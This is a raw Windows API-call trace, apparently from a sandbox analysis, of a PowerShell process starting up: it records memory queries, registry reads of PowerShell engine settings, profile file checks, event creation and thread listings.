	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.307] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.308] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.311] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0311.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.312] CoTaskMemFree (pv=0x246bd0) 
	[0311.316] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0311.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.316] CoTaskMemFree (pv=0x246bd0) 
	[0311.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.457] VirtualQuery (in: lpAddress=0x1cbdc0, lpBuffer=0x1ccc80, dwLength=0x30 | out: lpBuffer=0x1ccc80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.463] VirtualQuery (in: lpAddress=0x1cbdc0, lpBuffer=0x1ccc80, dwLength=0x30 | out: lpBuffer=0x1ccc80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.463] VirtualQuery (in: lpAddress=0x1cb610, lpBuffer=0x1cc4d0, dwLength=0x30 | out: lpBuffer=0x1cc4d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.463] VirtualQuery (in: lpAddress=0x1cb610, lpBuffer=0x1cc4d0, dwLength=0x30 | out: lpBuffer=0x1cc4d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.464] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdc18 | out: phkResult=0x1cdc18*=0x308) returned 0x0
	[0312.464] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb9c, lpData=0x0, lpcbData=0x1cdb98*=0x0 | out: lpType=0x1cdb9c*=0x1, lpData=0x0, lpcbData=0x1cdb98*=0x56) returned 0x0
	[0312.464] CoTaskMemAlloc (cb=0x5a) returned 0x1b866bd0
	[0312.464] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb6c, lpData=0x1b866bd0, lpcbData=0x1cdb68*=0x56 | out: lpType=0x1cdb6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdb68*=0x56) returned 0x0
	[0312.464] CoTaskMemFree (pv=0x1b866bd0) 
	[0312.465] RegCloseKey (hKey=0x308) returned 0x0
	[0312.465] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdc18 | out: phkResult=0x1cdc18*=0x308) returned 0x0
	[0312.465] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb9c, lpData=0x0, lpcbData=0x1cdb98*=0x0 | out: lpType=0x1cdb9c*=0x1, lpData=0x0, lpcbData=0x1cdb98*=0x56) returned 0x0
	[0312.465] CoTaskMemAlloc (cb=0x5a) returned 0x1b866bd0
	[0312.465] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb6c, lpData=0x1b866bd0, lpcbData=0x1cdb68*=0x56 | out: lpType=0x1cdb6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdb68*=0x56) returned 0x0
	[0312.465] CoTaskMemFree (pv=0x1b866bd0) 
	[0312.465] RegCloseKey (hKey=0x308) returned 0x0
	[0312.466] CoTaskMemAlloc (cb=0x20c) returned 0x1b834970
	[0312.466] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b834970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0312.466] CoTaskMemFree (pv=0x1b834970) 
	[0312.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0312.466] CoTaskMemAlloc (cb=0x20c) returned 0x1b834970
	[0312.466] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b834970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0312.466] CoTaskMemFree (pv=0x1b834970) 
	[0312.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0312.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0312.467] SetErrorMode (uMode=0x1) returned 0x1
	[0312.467] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb80 | out: lpFileInformation=0x1cdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0312.467] SetErrorMode (uMode=0x1) returned 0x1
	[0312.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0312.468] SetErrorMode (uMode=0x1) returned 0x1
	[0312.468] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb80 | out: lpFileInformation=0x1cdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0312.468] SetErrorMode (uMode=0x1) returned 0x1
	[0312.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0312.468] SetErrorMode (uMode=0x1) returned 0x1
	[0312.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb80 | out: lpFileInformation=0x1cdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0312.468] SetErrorMode (uMode=0x1) returned 0x1
	[0312.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0312.468] SetErrorMode (uMode=0x1) returned 0x1
	[0312.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb80 | out: lpFileInformation=0x1cdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0312.468] SetErrorMode (uMode=0x1) returned 0x1
	[0312.469] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.469] CoTaskMemFree (pv=0x246bd0) 
	[0312.470] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.470] CoTaskMemFree (pv=0x246bd0) 
	[0312.470] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.471] CoTaskMemFree (pv=0x246bd0) 
	[0312.472] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.472] CoTaskMemFree (pv=0x246bd0) 
	[0312.477] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.477] CoTaskMemFree (pv=0x246bd0) 
	[0312.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x308
	[0312.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1cc
	[0312.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0312.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0312.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x34c
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0312.479] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0312.480] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.481] CoTaskMemFree (pv=0x246bd0) 
	[0312.483] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0312.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cdd60 | out: lpMode=0x1cdd60) returned 1
	[0312.484] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.484] CoTaskMemFree (pv=0x246bd0) 
	[0312.487] SetEvent (hEvent=0x32c) returned 1
	[0312.488] SetEvent (hEvent=0x308) returned 1
	[0312.488] SetEvent (hEvent=0x1cc) returned 1
	[0312.488] SetEvent (hEvent=0x328) returned 1
	[0312.488] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0312.490] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0312.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.490] CoTaskMemFree (pv=0x246bd0) 
	[0312.490] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdab8 | out: phkResult=0x1cdab8*=0x35c) returned 0x0
	[0312.490] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cda3c, lpData=0x0, lpcbData=0x1cda38*=0x0 | out: lpType=0x1cda3c*=0x0, lpData=0x0, lpcbData=0x1cda38*=0x0) returned 0x2

Thread:
	id = 77
	os_tid = 0x99c


Thread:
	id = 82
	os_tid = 0xa08


Thread:
	id = 92
	os_tid = 0xa30


Thread:
	id = 102
	os_tid = 0x5d0


Thread:
	id = 103
	os_tid = 0x78c

	[0251.380] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0292.551] RegCloseKey (hKey=0x328) returned 0x0
	[0292.552] LocalFree (hMem=0x2a0c90) returned 0x0
	[0292.552] CloseHandle (hObject=0x1cc) returned 1
	[0292.552] CloseHandle (hObject=0x13) returned 1
	[0292.553] CloseHandle (hObject=0xf) returned 1
	[0292.553] RegCloseKey (hKey=0x308) returned 0x0
	[0292.553] RegCloseKey (hKey=0x304) returned 0x0
	[0292.553] RegCloseKey (hKey=0x300) returned 0x0
	[0292.554] LocalFree (hMem=0x2a0c20) returned 0x0
	[0298.563] RegCloseKey (hKey=0x300) returned 0x0
	[0300.511] RegCloseKey (hKey=0x300) returned 0x0
	[0307.728] RegCloseKey (hKey=0x394) returned 0x0
	[0307.728] RegCloseKey (hKey=0x390) returned 0x0
	[0307.728] RegCloseKey (hKey=0x36c) returned 0x0
	[0307.729] RegCloseKey (hKey=0x3a8) returned 0x0
	[0307.729] RegCloseKey (hKey=0x388) returned 0x0
	[0307.729] RegCloseKey (hKey=0x384) returned 0x0
	[0307.730] RegCloseKey (hKey=0x380) returned 0x0
	[0307.730] RegCloseKey (hKey=0x37c) returned 0x0
	[0307.730] RegCloseKey (hKey=0x378) returned 0x0
	[0307.730] RegCloseKey (hKey=0x374) returned 0x0
	[0307.731] RegCloseKey (hKey=0x370) returned 0x0
	[0307.731] RegCloseKey (hKey=0x348) returned 0x0
	[0307.731] RegCloseKey (hKey=0x3a4) returned 0x0
	[0307.731] RegCloseKey (hKey=0x3a0) returned 0x0
	[0307.731] RegCloseKey (hKey=0x368) returned 0x0
	[0307.732] RegCloseKey (hKey=0x364) returned 0x0
	[0307.732] RegCloseKey (hKey=0x360) returned 0x0
	[0307.732] RegCloseKey (hKey=0x35c) returned 0x0
	[0307.732] RegCloseKey (hKey=0x358) returned 0x0
	[0307.733] RegCloseKey (hKey=0x354) returned 0x0
	[0307.733] RegCloseKey (hKey=0x350) returned 0x0
	[0307.733] RegCloseKey (hKey=0x34c) returned 0x0
	[0307.733] RegCloseKey (hKey=0x39c) returned 0x0
	[0307.734] RegCloseKey (hKey=0x33c) returned 0x0
	[0307.734] RegCloseKey (hKey=0x338) returned 0x0
	[0307.734] RegCloseKey (hKey=0x334) returned 0x0
	[0307.734] RegCloseKey (hKey=0x330) returned 0x0
	[0307.734] RegCloseKey (hKey=0x32c) returned 0x0
	[0307.735] RegCloseKey (hKey=0x328) returned 0x0
	[0307.735] RegCloseKey (hKey=0x1cc) returned 0x0
	[0307.735] RegCloseKey (hKey=0x308) returned 0x0
	[0307.735] RegCloseKey (hKey=0x398) returned 0x0
	[0307.735] RegCloseKey (hKey=0x300) returned 0x0
	[0328.734] RegCloseKey (hKey=0x35c) returned 0x0

Thread:
	id = 174
	os_tid = 0x114


Thread:
	id = 273
	os_tid = 0xdc0

	[0313.907] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0313.911] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0313.915] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
